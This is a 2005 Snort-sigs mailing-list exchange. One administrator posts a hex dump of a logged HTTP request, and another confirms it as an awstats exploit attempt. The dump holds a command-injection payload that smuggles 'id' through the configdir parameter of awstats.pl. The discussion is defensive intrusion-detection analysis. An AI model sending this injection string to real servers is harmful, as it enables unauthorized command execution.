[Snort-sigs] Exploit attempt?

Michael Schwartzkopff misch at ...2846...
Tue Apr 5 06:25:19 EDT 2005


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Am Montag, 4. April 2005 17:02 schrieb Giles Coochey:
> I saw the "WEB-ATTACKS id command attempt" triggered today, with the
> following in the payload:
>
> 000 : 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 61 77 73   GET /cgi-bin/aws
> 010 : 74 61 74 73 2E 70 6C 3F 63 6F 6E 66 69 67 64 69   tats.pl?configdi
> 020 : 72 3D 7C 65 63 68 6F 25 32 30 3B 65 63 68 6F 25   r=|echo%20;echo%
> 030 : 32 30 3B 69 64 3B 65 63 68 6F 25 32 30 3B 65 63   20;id;echo%20;ec
> 040 : 68 6F 7C 20 48 54 54 50 2F 31 2E 31 0D 0A         ho| HTTP/1.1..
>
> Does that look like an awstats exploit attempt?
Yes.

>
> Does anyone have a vulnerability report on this?
http://www.securityfocus.com/bid/keyword/

>
> Should I attempt to report the source address to the appropriate
> authority I get through a whois query?
Good Joke !!!
What do you do if this is in Russia or China? Do you really think that anybody 
there takes care about you call?


- -- 
Dr. Michael Schwartzkopff
MultiNET Services GmbH
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFCUpGBqndXpO3Yl5sRAlWfAKCYYe0rmki4x8Mhm19adZI5EFaDNwCguSUH
/f5O95VJcNbgWwywuWDNz+Q=
=e4HQ
-----END PGP SIGNATURE-----




More information about the Snort-sigs mailing list